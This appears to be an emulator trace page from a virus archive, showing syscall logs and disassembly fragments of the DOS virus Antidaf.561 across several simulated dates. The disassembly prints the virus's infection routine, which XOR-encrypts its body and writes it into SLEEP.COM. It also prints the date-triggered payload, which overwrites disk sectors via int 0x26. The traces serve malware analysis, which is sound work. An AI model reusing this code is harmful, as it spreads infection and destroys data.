Sample viewer

vx.netlux.org/Virus.DOS.CivilWar.Antidaf.561

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T21:51:44.084282691Z	26	PC: 12a6a \| Set disk transfer address
2018-12-17T21:51:44.090307105Z	42	PC: 12a7a \| Get date 0x12a7a: cmp dh, 0xb 0x12a7d: jne 0x12a9d 0x12a7f: cmp al, 1 0x12a81: jne 0x12a9d 0x12a83: mov ah, 9 0x12a85: lea dx, word ptr [bp + 0x27d] 0x12a89: int 0x21 0x12a8b: mov ah, 0x19 0x12a8d: int 0x21 0x12a8f: mov dx, 0 0x12a92: mov cx, 0x10 0x12a95: mov bx, 0 0x12a98: int 0x26 0x12a9a: jmp 0x12b96 0x12a9d: lea dx, word ptr [bp + 0x267] 0x12aa1: mov ah, 0x4e 0x12aa3: xor cx, cx 0x12aa5: int 0x21 0x12aa7: mov ax, 0x3d02 0x12aaa: mov dx, 0xfe1e
2018-12-17T21:51:44.098034619Z	78	PC: 12aa7 \| Find first file
2018-12-17T21:51:44.105658435Z	61	PC: 12aaf \| Open file (Filename = 'SLEEP.COM')
2018-12-17T21:51:44.11867881Z	87	PC: 12aba \| Get or set file date and time
2018-12-17T21:51:44.120217192Z	63	PC: 12ad4 \| Read file or device (Read 6 bytes on handle 5)
2018-12-17T21:51:44.126604854Z	44	PC: 12b10 \| Get time 0x12b10: mov byte ptr ds:[bp + 0x335], dh 0x12b15: mov al, dh 0x12b17: xor al, byte ptr ds:[bp + 0x334] 0x12b1c: mov byte ptr ds:[bp + 0x336], al 0x12b21: lea si, word ptr [bp + 0x123] 0x12b25: mov di, 0xfd00 0x12b28: mov cx, 0x214 0x12b2b: lodsb al, byte ptr [si] 0x12b2c: xor al, byte ptr ds:[bp + 0x336] 0x12b31: stosb byte ptr es:[di], al 0x12b32: loop 0x12b2b 0x12b34: mov al, byte ptr ds:[bp + 0x336] 0x12b39: inc al 0x12b3b: mov byte ptr ds:[bp + 0x336], al 0x12b40: mov ax, 0x4200 0x12b43: call 0x12b9b 0x12b46: mov ah, 0x40 0x12b48: mov cx, 1 0x12b4b: lea dx, word ptr [bp + 0x27b] 0x12b4f: int 0x21
2018-12-17T21:51:44.129494357Z	66	PC: 12ba6 \| Move file pointer
2018-12-17T21:51:44.130907086Z	64	PC: 12b51 \| Write file or device (Write 1 bytes on handle 5)
2018-12-17T21:51:44.13487834Z	64	PC: 12b5c \| Write file or device (Write 2 bytes on handle 5)
2018-12-17T21:51:44.138077983Z	64	PC: 12b67 \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:51:44.140860672Z	66	PC: 12ba6 \| Move file pointer
2018-12-17T21:51:44.1423216Z	64	PC: 12b78 \| Write file or device (Write 29 bytes on handle 5)
2018-12-17T21:51:44.14597521Z	64	PC: 12b82 \| Write file or device (Write 532 bytes on handle 5)
2018-12-17T21:51:44.22960029Z	87	PC: 12b96 \| Get or set file date and time

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":165,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:40:18.674663493Z	26	PC: 12a6a \| Set disk transfer address
2018-12-25T11:40:18.676252372Z	42	PC: 12a7a \| Get date 0x12a7a: cmp dh, 0xb 0x12a7d: jne 0x12a9d 0x12a7f: cmp al, 1 0x12a81: jne 0x12a9d 0x12a83: mov ah, 9 0x12a85: lea dx, word ptr [bp + 0x27d] 0x12a89: int 0x21 0x12a8b: mov ah, 0x19 0x12a8d: int 0x21 0x12a8f: mov dx, 0 0x12a92: mov cx, 0x10 0x12a95: mov bx, 0 0x12a98: int 0x26 0x12a9a: jmp 0x12b96 0x12a9d: lea dx, word ptr [bp + 0x267] 0x12aa1: mov ah, 0x4e 0x12aa3: xor cx, cx 0x12aa5: int 0x21 0x12aa7: mov ax, 0x3d02 0x12aaa: mov dx, 0xfe1e
2018-12-25T11:40:18.678906066Z	78	PC: 12aa7 \| Find first file
2018-12-25T11:40:18.6854429Z	61	PC: 12aaf \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:40:18.692646745Z	87	PC: 12aba \| Get or set file date and time
2018-12-25T11:40:18.695366043Z	63	PC: 12ad4 \| Read file or device (Read 6 bytes on handle 5)
2018-12-25T11:40:18.702268333Z	44	PC: 12b10 \| Get time 0x12b10: mov byte ptr ds:[bp + 0x335], dh 0x12b15: mov al, dh 0x12b17: xor al, byte ptr ds:[bp + 0x334] 0x12b1c: mov byte ptr ds:[bp + 0x336], al 0x12b21: lea si, word ptr [bp + 0x123] 0x12b25: mov di, 0xfd00 0x12b28: mov cx, 0x214 0x12b2b: lodsb al, byte ptr [si] 0x12b2c: xor al, byte ptr ds:[bp + 0x336] 0x12b31: stosb byte ptr es:[di], al 0x12b32: loop 0x12b2b 0x12b34: mov al, byte ptr ds:[bp + 0x336] 0x12b39: inc al 0x12b3b: mov byte ptr ds:[bp + 0x336], al 0x12b40: mov ax, 0x4200 0x12b43: call 0x12b9b 0x12b46: mov ah, 0x40 0x12b48: mov cx, 1 0x12b4b: lea dx, word ptr [bp + 0x27b] 0x12b4f: int 0x21
2018-12-25T11:40:18.704775521Z	66	PC: 12ba6 \| Move file pointer
2018-12-25T11:40:18.707648507Z	64	PC: 12b51 \| Write file or device (Write 1 bytes on handle 5)
2018-12-25T11:40:18.710361998Z	64	PC: 12b5c \| Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:40:18.712988529Z	64	PC: 12b67 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:40:18.716878466Z	66	PC: 12ba6 \| Move file pointer (See above)
2018-12-25T11:40:18.718410638Z	64	PC: 12b78 \| Write file or device (Write 29 bytes on handle 5)
2018-12-25T11:40:18.722044602Z	64	PC: 12b82 \| Write file or device (Write 532 bytes on handle 5)
2018-12-25T11:40:18.804643172Z	87	PC: 12b96 \| Get or set file date and time

{"DateBased":true,"Day":1,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":165,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:40:19.242353692Z	26	PC: 12a6a \| Set disk transfer address
2018-12-25T11:40:19.24395884Z	42	PC: 12a7a \| Get date 0x12a7a: cmp dh, 0xb 0x12a7d: jne 0x12a9d 0x12a7f: cmp al, 1 0x12a81: jne 0x12a9d 0x12a83: mov ah, 9 0x12a85: lea dx, word ptr [bp + 0x27d] 0x12a89: int 0x21 0x12a8b: mov ah, 0x19 0x12a8d: int 0x21 0x12a8f: mov dx, 0 0x12a92: mov cx, 0x10 0x12a95: mov bx, 0 0x12a98: int 0x26 0x12a9a: jmp 0x12b96 0x12a9d: lea dx, word ptr [bp + 0x267] 0x12aa1: mov ah, 0x4e 0x12aa3: xor cx, cx 0x12aa5: int 0x21 0x12aa7: mov ax, 0x3d02 0x12aaa: mov dx, 0xfe1e
2018-12-25T11:40:19.246051046Z	78	PC: 12aa7 \| Find first file
2018-12-25T11:40:19.251732661Z	61	PC: 12aaf \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:40:19.258996454Z	87	PC: 12aba \| Get or set file date and time
2018-12-25T11:40:19.260282914Z	63	PC: 12ad4 \| Read file or device (Read 6 bytes on handle 5)
2018-12-25T11:40:19.266325059Z	44	PC: 12b10 \| Get time 0x12b10: mov byte ptr ds:[bp + 0x335], dh 0x12b15: mov al, dh 0x12b17: xor al, byte ptr ds:[bp + 0x334] 0x12b1c: mov byte ptr ds:[bp + 0x336], al 0x12b21: lea si, word ptr [bp + 0x123] 0x12b25: mov di, 0xfd00 0x12b28: mov cx, 0x214 0x12b2b: lodsb al, byte ptr [si] 0x12b2c: xor al, byte ptr ds:[bp + 0x336] 0x12b31: stosb byte ptr es:[di], al 0x12b32: loop 0x12b2b 0x12b34: mov al, byte ptr ds:[bp + 0x336] 0x12b39: inc al 0x12b3b: mov byte ptr ds:[bp + 0x336], al 0x12b40: mov ax, 0x4200 0x12b43: call 0x12b9b 0x12b46: mov ah, 0x40 0x12b48: mov cx, 1 0x12b4b: lea dx, word ptr [bp + 0x27b] 0x12b4f: int 0x21
2018-12-25T11:40:19.268873623Z	66	PC: 12ba6 \| Move file pointer
2018-12-25T11:40:19.270110403Z	64	PC: 12b51 \| Write file or device (Write 1 bytes on handle 5)
2018-12-25T11:40:19.272521271Z	64	PC: 12b5c \| Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:40:19.275325489Z	64	PC: 12b67 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:40:19.277783864Z	66	PC: 12ba6 \| Move file pointer (See above)
2018-12-25T11:40:19.27898238Z	64	PC: 12b78 \| Write file or device (Write 29 bytes on handle 5)
2018-12-25T11:40:19.282079973Z	64	PC: 12b82 \| Write file or device (Write 532 bytes on handle 5)
2018-12-25T11:40:19.464863415Z	87	PC: 12b96 \| Get or set file date and time

{"DateBased":true,"Day":3,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":165,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:40:19.279228501Z	26	PC: 12a6a \| Set disk transfer address
2018-12-25T11:40:19.280922689Z	42	PC: 12a7a \| Get date 0x12a7a: cmp dh, 0xb 0x12a7d: jne 0x12a9d 0x12a7f: cmp al, 1 0x12a81: jne 0x12a9d 0x12a83: mov ah, 9 0x12a85: lea dx, word ptr [bp + 0x27d] 0x12a89: int 0x21 0x12a8b: mov ah, 0x19 0x12a8d: int 0x21 0x12a8f: mov dx, 0 0x12a92: mov cx, 0x10 0x12a95: mov bx, 0 0x12a98: int 0x26 0x12a9a: jmp 0x12b96 0x12a9d: lea dx, word ptr [bp + 0x267] 0x12aa1: mov ah, 0x4e 0x12aa3: xor cx, cx 0x12aa5: int 0x21 0x12aa7: mov ax, 0x3d02 0x12aaa: mov dx, 0xfe1e
2018-12-25T11:40:19.283695018Z	9	PC: 12a8b \| Display string (String= ' The Anti-DAF virus DAF-TRUCKS Eindhoven Hugo vd Goeslaan 1 Postbus 90063 5600 PR Eindhoven, The Netherlands DAF sucks... (c) 1992 Dark Helmet & The Virus Research Centre ')
2018-12-25T11:40:19.303597827Z	25	PC: 12a8f \| Get default drive